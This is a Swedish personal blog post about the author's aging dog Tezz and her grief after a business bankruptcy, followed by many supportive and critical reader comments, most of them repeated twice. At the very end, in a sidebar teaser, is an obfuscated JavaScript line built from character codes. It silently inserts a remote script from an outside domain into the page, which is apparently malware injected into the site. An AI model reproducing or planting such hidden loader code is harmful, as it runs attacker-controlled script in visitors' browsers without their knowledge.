Tezz, Ett kärt återseende, men en tuff insikt…….

IMG_3987

 

Tezz!

Min älskade, finaste trognaste vän.

jag förstår verkligen det där uttrycket ”Hunden är människans bästa vän”. Tezz är 15 år gammal. En Bordercollie /schäfer blandning. Jag träffade Ludvigs pappa som hade henne sedan tidigare. Vi fann varandra direkt. Det sa verkligen KLICK. Alltså mellan mig och Tezz❤️

Jag var då precis fyllda 18 år. Det är alltså snart 12 år sedan. Sessan dess har hon vandrat vid min sida dag för dag, år ut och år in. När vi separerade så var jag beredd att lämna ALLT förutom Ludvig & Tezz. Tezz var iof inte min, men jag gav inte med mig på den punkten!

Tezz har nämligen varit min vapendragare i min föredetta handelsträdgård My’s Blommor. Hon har gått lös i butiken och läran känna både personal och stamkunder. Hon blev som en intevnatrie i butiken. Vilken lyx, både för henne och mig. Att få röra sig fritt i våra lokaler, vara utomhus större delar på dygnet och vara med mig alla dagar i veckan. Så när vi separerade så föll det sig naturligt att hon skulle fortsätta vara med mig och Ludvig. (Tyckte jag hallfall )

 Sen kom konkursen den 4 juli förra året. ( Läs det inlägget HÄR ).

Inte nog med separation ifrån mina anställda, mina kunder, min trygghet, mitt liv, och ALLT annat som den drog med sig. jag minns så väl när jag satt på gruset på baksidan intill lastkajen. Jag grät….. jag grät samtidigt som konkursförvaltaren var inne i lokalen, jag blev myndigförklarade och bad om att få gå ut för att hämta andan. Jag trodde nämligen jag skulle kvävas. Jag fick ingen luft. Den smärta som jag kände inom mig, på alla plan krossade mig totalt.

Då kom Tezz fram till mig, precis som hon alltid gjort. Hon puffade på sig med sin blöta nos, kröp upp i knät och tröstade mig. Jag borrade in mitt ansikte i hennes päls, och grät. Vi satt där tillsammans, hon tröstade mig tills jag kunde andas normalt och sakta men säkert resa mig, skaka av mig och gå in för att svara på alla miljontals frågor kring allt ifrån bokföring, försäljning, leverantörer, avtal osv….

Det jag insåg var att livet aldrig kommer att bli sig likt. Det skulle bli svårt för mig att ha hand om Tezz som tidigare. jag var ”bortskämd” med att ha kunna ha henne med mig på jobbet varje dag. Var jag i Stockholm eller Amsterdam dit jag pendlat i över tio år, så var hon trygg med sin reservhusse eller någon av tjejerna i personelen som hon kände mer än väl….. Det fungerade och hon mådde toppen! ☺️

-Tezz, Min fina stöttepelare!

 Samma sak var det efter separationen, när jag köpte vårat första egna hus. Då var hon också ett enormt stöd. Det blev vandaliserat, jag blev utsatt för hot, trakasserier och genomgick ett rent helvete. Sönderskurna däck, trasiga fönster  orm i brevlådan osv……  Utan Tezz då så hade jag aldrig klarat av denna tuffa period.

Vi har gått igenom mycket hon och jag. Tillsammans. Skulle kunna skriva en hel bok om bara det. 

IMG_3985

Jag lämnade Tezz hos sin reserv husse farbror Lothar inför skolstart förra året ( läs det inlägget HÄR )

Med en tanke om att hämta hem henne så fort skolan var över….  Men precis som jag innerst inne visste när jag lämnade henne så blev det inte så.

Jag visste det i hela hjärtat. Jag kände det inom mig😔😰

men jag försökte förneka det för mig själv och istället fokusera på att hitta lösningar. En lösning efter skolan, att hitta en vardag där det fungerade.

Tezz har varit med mig i Stockholm en hel del. När jag bodde hos Maggan, så var hon med där hemma också, hon trivdes i olika cityparker så som humlan och Vasaparken. Hon trivdes vart som helst… bara hon var med mig.

När vi flyttade upp till Sigtuna så kände sig även hon hemma. Vacker natur, långa brandpromenader osv. Men med alla mina jobb för att hålla näsan över vattenytan efter konkursen så blev det omöjligt.

Jag började jobba på SATS direkt efter utbildningen, där kan man såklart inte ha Tezz med sig. Skulle jag låta henne vara ensam hemma på dagarna? Nej. Skulle jag låta henne vara själv i bilen och jag springa in och ut och rasta henne. NEJ!

Jag var till och med och tittade på ett hunddagis i Märsta.

Men det kändes inte rätt. Tezz är för gammal. Hon förtjänar bättre!!!

Så jag bestämde mig för att låta henne stanna kvar hos sin reservhusse som är pensionär och bor på landet. Hon springer lös i hans stora trädgård och har sällskap hela dagarna…..

-DET betyder ALLT för mig!🙏🏻❤️

Hur j*vla ont det än gjorde att ta det beslutet så var det det enda rätta. Ännu en uppoffring efter separationen, konkursen och hur livet har tagit ny vändning. Nu låter jag som en gnällspik. Men jag är j*vligt trött på stora beslut och tunga uppoffringar. Jag är inte mer än människa. Det gör ont!!!!!  

Idag var första gången sedan Augusti förra året som vi träffades……. SOM Lilleman tjatat. Han saknar henne enormt mycket! ❤️

IMG_3968 IMG_3970 IMG_3972 IMG_3978

Men tyvärr så var det inte samma gamla vanliga Tezz. Långt ifrån faktiskt.💔

Tezz har gått vid min sida sedan jag var 18 år. Inte vikt av en sekund om jag inte varit bortres.

Idag kände hon inte igen min röst, hon hörde inte när jag kallade på henne. Jag blev chockad, stelnade till. Kallade igen, långt innan jag var framme vid dörren, ropade genom trädgården.

Hon kom fram… efter många om och men. Tittade konstigt, gick långsamma fram. Min ”gamla” Tezz hade skällt och ylat av lycka och rusat fram emot mig. När vi bål möttes blev hon glad, tokigt glad, kröp upp i min famn, ylade, tjöt och pussade på mig.

Men min fina Tezz kan knappt se eller höra längre….. Hon är riktgt gammal nu 😰

-Jag fick en chock!

Farbror Lothar skämmer bort henne med kärlek och lite go-saker🙏🏻

Hon springer lös i en riktig idyll för en gammal hund. Hon verkar inte ha ont, inte mer än att hon som vanligt är lite stel… men det hör ju till på ålderns höst. Många nya gråa hårstrån, det hör också till….. Men jag kände inte igen henne. Inte hennes personlighet, och det här ”vimsiga” sidan som jag nu fick se.

Hon är kanske senil? Usch! Jag vet inte……

Jag hade sett fram emot att låna henne så ofta vi kan under våra Ölands veckor, ta långa mysiga promenader längsmed vattnet. Låta henne bo kvar hos Lothar där hon nu känner sig hemma.Hon ska INTE behöva pendla mellan mig och honom. Men jag ville finnas där för henne, hennes sista år. Dagligen, med promenader, kärlek och mys.  

Men om jag ska vara helt ärlig så är jag lite chockad över hennes tillstånd. Jag tror inte att det kommer att bli några ”sista år tillsammans” .

Hon var riiiiktigt gammal och skruttig om man jämför med min pigga tjej som jag lämnade för ett år sedan….  

Jag ska ta henne till en veterinär nästa gång de är Ölandsvecka. Jag behöver rådfråga och vill ha professionell hjälp.

Jag ska ringa veterinär Sattu uppe i Skogsby imorgon när jag sitter i bilen mot Stockholm. Hon har räddat livet på Tezz för längesen när hon fick cancer i livmodern.

Hon har alltid hjälp mig med Tezz. Jag känner mig trygg med henne.

Usch, nu står jag inför ännu ett stort, tufft enorm jobbigt och avgörande beslut!

-Fina älskade Tezz, jag älskar dig av hela mitt hjärta!❤️

OLYMPUS DIGITAL CAMERA

/ My Martens 

 

73 Komentarer

 1. Det bästa som finns att ha en sådan trogen vän❤ blir rörd till tårar av ditt inlägg❤
  Varma kramar till dej lilleman å Tezz❤❤❤

 2. Hjärtat ❤️❤️❤️❤️ Tårarna rinner…. förstår din känsla har själv en gammal hund dom förändras snabbt. Hon älskar dig tro mig men hon är inte riktigt med längre som hon var förrut. Låt henne må bra i den miljö som hon har den sista tiden. Kramar i massor ❤️❤️❤️

 3. Ja du My
  Det är ett av det svåraste besluten man står inför.
  Jag vet för jag har varit där. Tårarna komet fram nu
  Men man ska alltid tänka på djurets bästa.
  Gör som du tänker en riktig undersökning
  och ta beslut efter den.
  Kram L

 4. Sattu är kanonbra. Tog tyvärr bort vår Lukas 29.6. Han hade fått Kennelhostvaccin, o blev jätte dålig.?Vi kämpade med honom hela midsommar helgen efter vi hade varit på Anicura i Kalmar. Sattu hade tyvärr inte tid. Ringde Sattu efter midsommar o hon sa åk intill Anicura igen o ta rtg på honom. Han hade vatten i lungerna o ett förstorat hjärta. Blev remitterade till Läckeby, på vägen upp bestämde vi oss att vi vill ha en frisk hund. Vet på Läckeby sa att han kan aldrig vara med mig och cykla varje morgon 2 km. Måste ha hjärtmedicin o kanske levt ca 6-12 mån. Han somnade in 29.6 kl.16.00?Han ligger i minneslunden i Läckeby.❤️Härligt för oss varje gång vi åker från Öland eller tillbaks från Stockholm, kan vi stanna o fundera ❤️❤️❤️

 5. Det kan också vara att en hund som blivit lämnad kan uppvisa sådant här beteende. Ungefär som att ”jaha är det dags att komma nu. En hund blir besviken precis som en människa av att bli lämnad. Prata med en hundtränare som kan förklara detta beteende.

 6. Å har du inte träffat Tezz på ett år, trots ni bott på ön en månad, då var det kärt återseende. Minns att du skrev förra våren att Tezz blivit så gammal, skruttig, gråhårig, halt och med krämpor och att hon inte var som hon tidigare varit, man uppfattade det då som att hon var döende eller väldigt dålig. Men du lämnade henne pigg för ett år sedan skriver du så hon blev piggare och bättre igen då. Kanske är hon besviken på dig el känner inte igen dig då det gått lång tid, el kanske att hon har fått dålig syn och hörsel. Kanske blir hon bättre igen <3

 7. Det bästa som finns att ha en sådan trogen vän❤ blir rörd till tårar av ditt inlägg❤
  Varma kramar till dej lilleman å Tezz❤❤❤

 8. Hjärtat ❤️❤️❤️❤️ Tårarna rinner…. förstår din känsla har själv en gammal hund dom förändras snabbt. Hon älskar dig tro mig men hon är inte riktigt med längre som hon var förrut. Låt henne må bra i den miljö som hon har den sista tiden. Kramar i massor ❤️❤️❤️

 9. Ja du My
  Det är ett av det svåraste besluten man står inför.
  Jag vet för jag har varit där. Tårarna komet fram nu
  Men man ska alltid tänka på djurets bästa.
  Gör som du tänker en riktig undersökning
  och ta beslut efter den.

  Kram L

 10. Sattu är kanonbra. Tog tyvärr bort vår Lukas 29.6. Han hade fått Kennelhostvaccin, o blev jätte dålig.😢Vi kämpade med honom hela midsommar helgen efter vi hade varit på Anicura i Kalmar. Sattu hade tyvärr inte tid. Ringde Sattu efter midsommar o hon sa åk intill Anicura igen o ta rtg på honom. Han hade vatten i lungerna o ett förstorat hjärta. Blev remitterade till Läckeby, på vägen upp bestämde vi oss att vi vill ha en frisk hund. Vet på Läckeby sa att han kan aldrig vara med mig och cykla varje morgon 2 km. Måste ha hjärtmedicin o kanske levt ca 6-12 mån. Han somnade in 29.6 kl.16.00😢Han ligger i minneslunden i Läckeby.❤️Härligt för oss varje gång vi åker från Öland eller tillbaks från Stockholm, kan vi stanna o fundera ❤️❤️❤️

 11. Kära fina My
  Lider med dig ? fick ta bort min älskade nalle i oktober förra året, han blev 11 år och 4 månader.
  Han hade varit lite stel och så under ett par år men i övrigt pigg och älskade att leka.
  Förra året vaknade jag och mötte en väldigt sjuk nalle ?
  Tungt beslut, men det enda rätta om hunden är gammal och sjuk. Jag älskade honom över allt annat så därför fick han somna in.
  Som djurägare får man inte vara egoistisk, utan man tar rätt beslut. Tror och vet att du kommer göra det rätta.
  Varm kram till dig

 12. Brukar aldrig kommentera men kan inte låta bli nu. Hur kan man överge sin hund som man påstår sig älska och som levt med dig i så många år och att låta det gå ett helt år utan att hälsa på henne. En hund sörjer precis som en människa gör. En hund kan dö av sorg. Är hon senil som du påstår hade hon ju behövt dig ännu mer. Jobb, karriär, mode var tydligen viktigare för dig än din gamla sjuka hund. Så fruktansvärt sorgligt.

  • Jag behövde hoppa på en utbildning, och ha TRE jobb efter konkursen….. hur fan kan du uttrycka dig så som du gör?! Jag gjorde det enda rätta för Tezz. Jag satte mitt altergo sist, och Tezz först! Det var en enormt ogenomtänkt, känslokall kommentar där du inte överhuvdtaget satt dig in i min/vår situation. Hade jag inte försörjt oss, och istället satt mig ner med min älskade Tezz. Då hade varken jag, Tezz eller Ludvig haft boende, mat eller drägligt liv! Att du skriver ”jobb, karriär OCH MODE i din sjukt ogenomtänkta kommentar visar bara att du helt saknar förmågan att sätta dig in i externa situationer! – Skäms på dig! / My Martens

  • Marie! Skojar du?
   Tezz är 14 år, inte fan flyttar man runt på henne. Då är man jävligt egoistisk. 14 år är en hög ålder och inte konstigt att hon
   börjar tackla av. Hon verkar ha det jättebra sin sista tid hos sin
   extrahusse.

 13. Det finns alltid personer som kommer lägga sig i vad för beslut man måste ta i olika situationer, både bra och dåliga!
  Du har valt det som är bäst för Tezz där och då. Även om det är smärtsamt , så gjorde du ett val till det bättre för henne tycker jag. ❤️ ❤️
  Ha en bra dag i bilen imorgon efter du vart med Ludvig i skolan ?? Kör försiktgit ?
  God natt

 14. Det kan också vara att en hund som blivit lämnad kan uppvisa sådant här beteende. Ungefär som att ”jaha är det dags att komma nu. En hund blir besviken precis som en människa av att bli lämnad. Prata med en hundtränare som kan förklara detta beteende.

 15. Å har du inte träffat Tezz på ett år, trots ni bott på ön en månad, då var det kärt återseende. Minns att du skrev förra våren att Tezz blivit så gammal, skruttig, gråhårig, halt och med krämpor och att hon inte var som hon tidigare varit, man uppfattade det då som att hon var döende eller väldigt dålig. Men du lämnade henne pigg för ett år sedan skriver du så hon blev piggare och bättre igen då. Kanske är hon besviken på dig el känner inte igen dig då det gått lång tid, el kanske att hon har fått dålig syn och hörsel. Kanske blir hon bättre igen <3

 16. Kära fina My
  Lider med dig 😢 fick ta bort min älskade nalle i oktober förra året, han blev 11 år och 4 månader.
  Han hade varit lite stel och så under ett par år men i övrigt pigg och älskade att leka.
  Förra året vaknade jag och mötte en väldigt sjuk nalle 😢
  Tungt beslut, men det enda rätta om hunden är gammal och sjuk. Jag älskade honom över allt annat så därför fick han somna in.
  Som djurägare får man inte vara egoistisk, utan man tar rätt beslut. Tror och vet att du kommer göra det rätta.
  Varm kram till dig

 17. Brukar aldrig kommentera men kan inte låta bli nu. Hur kan man överge sin hund som man påstår sig älska och som levt med dig i så många år och att låta det gå ett helt år utan att hälsa på henne. En hund sörjer precis som en människa gör. En hund kan dö av sorg. Är hon senil som du påstår hade hon ju behövt dig ännu mer. Jobb, karriär, mode var tydligen viktigare för dig än din gamla sjuka hund. Så fruktansvärt sorgligt.

  • Jag behövde hoppa på en utbildning, och ha TRE jobb efter konkursen….. hur fan kan du uttrycka dig så som du gör?! Jag gjorde det enda rätta för Tezz. Jag satte mitt altergo sist, och Tezz först! Det var en enormt ogenomtänkt, känslokall kommentar där du inte överhuvdtaget satt dig in i min/vår situation. Hade jag inte försörjt oss, och istället satt mig ner med min älskade Tezz. Då hade varken jag, Tezz eller Ludvig haft boende, mat eller drägligt liv! Att du skriver ”jobb, karriär OCH MODE i din sjukt ogenomtänkta kommentar visar bara att du helt saknar förmågan att sätta dig in i externa situationer! – Skäms på dig! / My Martens

  • Marie! Skojar du?
   Tezz är 14 år, inte fan flyttar man runt på henne. Då är man jävligt egoistisk. 14 år är en hög ålder och inte konstigt att hon
   börjar tackla av. Hon verkar ha det jättebra sin sista tid hos sin
   extrahusse.

 18. Det finns alltid personer som kommer lägga sig i vad för beslut man måste ta i olika situationer, både bra och dåliga!
  Du har valt det som är bäst för Tezz där och då. Även om det är smärtsamt , så gjorde du ett val till det bättre för henne tycker jag. ❤️ ❤️
  Ha en bra dag i bilen imorgon efter du vart med Ludvig i skolan 😍😘 Kör försiktgit 🚘
  God natt

 19. Fina My stå på dig. Hoppas allt blir bättre när du pratat med Sattu. En dag kommer tyvärr beslutet. Du måste tänka på Tezz att hon har ett bra liv liksom du o Lilleman. Kram ?

 20. Fina My stå på dig. Hoppas allt blir bättre när du pratat med Sattu. En dag kommer tyvärr beslutet. Du måste tänka på Tezz att hon har ett bra liv liksom du o Lilleman. Kram 💞

 21. Ska absolut inte dömma dig och är heller inte hundpsykolog men ett år låter väldigt länge, några helgbesök då och då hade räckt.

 22. Jag ville bara skriva att jag var med om precis samma sak med min förra hund. O jag hade henne med mig när jag jobbade. Varje dag i 11 år. Under det 12e året gick allt jättefort. Hon blev precis som Tezz. Varken hörde, såg eller tycktes känna igen en. Och det hände när jag hade henne. Vad jag menar är att låt ingen försöka få dig att tro att det är ditt fel…bry dig inte om dumma kommentarer, folk kan va så trångsynta!

 23. Så sorgligt när djur blir gamla, vet hur det känns. ? Hjärtat brister…Du har gjort det rätta för henne, tänk vad hon har haft det bra. En hund har man i så många år och livet förändras, du blev tvungen att ta det beslutet och hon har ju haft det fantastiskt bra som du beskriver. Hundar går ju inte och saknar , de lever i nuet. Däremot har hon nog blivit lite senil som du skriver, eftersom det tog tid innan hon kände igen dig. Stor varm kram till dig <3

 24. Åhh tårarna rinner??Du som skriver ” hur kan man överge…” här handlar det om det bästa för djuret o Tezz i detta fallet, hon ska vara där hon mår bäst. Bra My att ta råd av expertis, jag pratar av egen erfarenhet när min häst blev gammal o skruttig jag kunde inte släppa taget o ville ha han in i det sista men i efterhand har jag tänkt så många gånger att jag skulle låtit han somna in tidigare o själv varit starkare men man älskar sina djur över allt o jag var såå ledsen. Önskar dig allt gott o styrka i ditt beslut framåt. Kram

 25. Ska absolut inte dömma dig och är heller inte hundpsykolog men ett år låter väldigt länge, några helgbesök då och då hade räckt.

 26. 15 år för en hund är ju ändå väldigt gammalt så du gjorde helt rätt som inte hade henne på dagis utan lät henne leva ett fint hundliv på Öland i stället. Börjar själv få lite ångest då jag har häst o hon ska fylla 26 år. Ännu så länge är hon fortfarande pigg o glad men är trots allt äldre. Älskar djur men det är sjukt sjukt tungt när man måste ta bort dem eller som du gick göra lämna bort trots att det inte var vad du ville. Stor kram❤

 27. Jag ville bara skriva att jag var med om precis samma sak med min förra hund. O jag hade henne med mig när jag jobbade. Varje dag i 11 år. Under det 12e året gick allt jättefort. Hon blev precis som Tezz. Varken hörde, såg eller tycktes känna igen en. Och det hände när jag hade henne. Vad jag menar är att låt ingen försöka få dig att tro att det är ditt fel…bry dig inte om dumma kommentarer, folk kan va så trångsynta!

 28. Om alla hundar har det så bra som tess med all den kärlek hon får man överger inte sin hund när man ser till hundens bästa så my du har gjort allt för att Tess ska få en bra ålderdom hon vet att det är du som kommer fast det tar lite längre tid så ni gnällspikaar sköt er själva och sluta lägg näsan i det som inte angår er.kram till dig my och Goa Tess

 29. Så sorgligt när djur blir gamla, vet hur det känns. 🙁 Hjärtat brister…Du har gjort det rätta för henne, tänk vad hon har haft det bra. En hund har man i så många år och livet förändras, du blev tvungen att ta det beslutet och hon har ju haft det fantastiskt bra som du beskriver. Hundar går ju inte och saknar , de lever i nuet. Däremot har hon nog blivit lite senil som du skriver, eftersom det tog tid innan hon kände igen dig. Stor varm kram till dig <3

 30. Åhh tårarna rinner😪😪Du som skriver ” hur kan man överge…” här handlar det om det bästa för djuret o Tezz i detta fallet, hon ska vara där hon mår bäst. Bra My att ta råd av expertis, jag pratar av egen erfarenhet när min häst blev gammal o skruttig jag kunde inte släppa taget o ville ha han in i det sista men i efterhand har jag tänkt så många gånger att jag skulle låtit han somna in tidigare o själv varit starkare men man älskar sina djur över allt o jag var såå ledsen. Önskar dig allt gott o styrka i ditt beslut framåt. Kram

 31. 15 år för en hund är ju ändå väldigt gammalt så du gjorde helt rätt som inte hade henne på dagis utan lät henne leva ett fint hundliv på Öland i stället. Börjar själv få lite ångest då jag har häst o hon ska fylla 26 år. Ännu så länge är hon fortfarande pigg o glad men är trots allt äldre. Älskar djur men det är sjukt sjukt tungt när man måste ta bort dem eller som du gick göra lämna bort trots att det inte var vad du ville. Stor kram❤

 32. Om alla hundar har det så bra som tess med all den kärlek hon får man överger inte sin hund när man ser till hundens bästa så my du har gjort allt för att Tess ska få en bra ålderdom hon vet att det är du som kommer fast det tar lite längre tid så ni gnällspikaar sköt er själva och sluta lägg näsan i det som inte angår er.kram till dig my och Goa Tess

 33. My du har tagit stora beslut senaste åren. Dom besluten har du tagit utefter det som hänt. Förstår att beslutet med Tezz är inte lätt (inte några av din andra beslut heller). Bra att du tar expertis hjälp! Energin räcker inte alltid och då behöver man hjälp utifrån.
  Ta hand om dig!

 34. Så länge hon inte har ont någonstans vilket betyder att hon äter, dricker och gör sina behov ute så spelar det ju ingen roll om inte hör eller ser så bra. Om hon får springa fritt ute också så tycker jag inte du skall låta henne somna in än.
  När hon däremot inte äter, inte vill gå ut på promenader osv osv – ja då är nog dags.
  All kärlek till er ♥ ♥ ♥

 35. Kära My.
  Det är inte lätt. Jag veet. Min vovve två år gammal fick bo hos styvfarsan. Jag bröt fotleden på vintern. sedan opereredes mitt öra. Så Bea fick vara hos styvfar.
  Hon stannade kvar på grund av min situation.
  Får bilder varje dag hur hon myser och hjälper till med ved och liknande.. De bor i skogen, bland sjöar och sådant.
  Men när de hämtade henne, och hon tittade förskräkt ur bilen, glömmer jag aldrig.
  Men vi träffas regelbundet, och då blir det pussar.
  Hon är bara 9 år, så hon förstår.
  Vi i familjen hade en äldre labrador. Gammal, och sjuk. Hon blev av naturliga skäl passiv. Men jag tror att de förstår ändå. De är bara trötta.
  MEN VARFÖR, VILL MAN Trycka ner en person, pga sina hjärtes djurvänner. Skapa skuldkänslor..

 36. Till er som gnäller på My. Hunden är 15 år, det är som 90 människoår. Det måste väl vara toppen att få vara på en plats och slippa flänga runt. Jag är 54 år och orkar knappt med det tempot som är i samhället.Empati och kärlek är vad jag ser i beslutet att hon valde att lämna hunden hos sin reservmatte

 37. My du har tagit stora beslut senaste åren. Dom besluten har du tagit utefter det som hänt. Förstår att beslutet med Tezz är inte lätt (inte några av din andra beslut heller). Bra att du tar expertis hjälp! Energin räcker inte alltid och då behöver man hjälp utifrån.
  Ta hand om dig!

 38. Så länge hon inte har ont någonstans vilket betyder att hon äter, dricker och gör sina behov ute så spelar det ju ingen roll om inte hör eller ser så bra. Om hon får springa fritt ute också så tycker jag inte du skall låta henne somna in än.

  När hon däremot inte äter, inte vill gå ut på promenader osv osv – ja då är nog dags.

  All kärlek till er ♥ ♥ ♥

 39. Kära My.
  Det är inte lätt. Jag veet. Min vovve två år gammal fick bo hos styvfarsan. Jag bröt fotleden på vintern. sedan opereredes mitt öra. Så Bea fick vara hos styvfar.
  Hon stannade kvar på grund av min situation.
  Får bilder varje dag hur hon myser och hjälper till med ved och liknande.. De bor i skogen, bland sjöar och sådant.
  Men när de hämtade henne, och hon tittade förskräkt ur bilen, glömmer jag aldrig.
  Men vi träffas regelbundet, och då blir det pussar.
  Hon är bara 9 år, så hon förstår.

  Vi i familjen hade en äldre labrador. Gammal, och sjuk. Hon blev av naturliga skäl passiv. Men jag tror att de förstår ändå. De är bara trötta.

  MEN VARFÖR, VILL MAN Trycka ner en person, pga sina hjärtes djurvänner. Skapa skuldkänslor..

 40. Till er som gnäller på My. Hunden är 15 år, det är som 90 människoår. Det måste väl vara toppen att få vara på en plats och slippa flänga runt. Jag är 54 år och orkar knappt med det tempot som är i samhället.Empati och kärlek är vad jag ser i beslutet att hon valde att lämna hunden hos sin reservmatte

 41. Hej My! Så sorgligt med din hund. Behöver kanske somna in men det är ett svårt beslut.
  Läste detta inlägg nu och tänkte vem var det som trakasserade dig och gjorde så hemska saker när du flyttade till hus? Vet du vem det var? Så otrevligt.
  Vill du skriva ett inlägg om det eller har du redan gjort det kanske?
  Stor kram till dig.

 42. Hej My! Så sorgligt med din hund. Behöver kanske somna in men det är ett svårt beslut.
  Läste detta inlägg nu och tänkte vem var det som trakasserade dig och gjorde så hemska saker när du flyttade till hus? Vet du vem det var? Så otrevligt.
  Vill du skriva ett inlägg om det eller har du redan gjort det kanske?
  Stor kram till dig.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/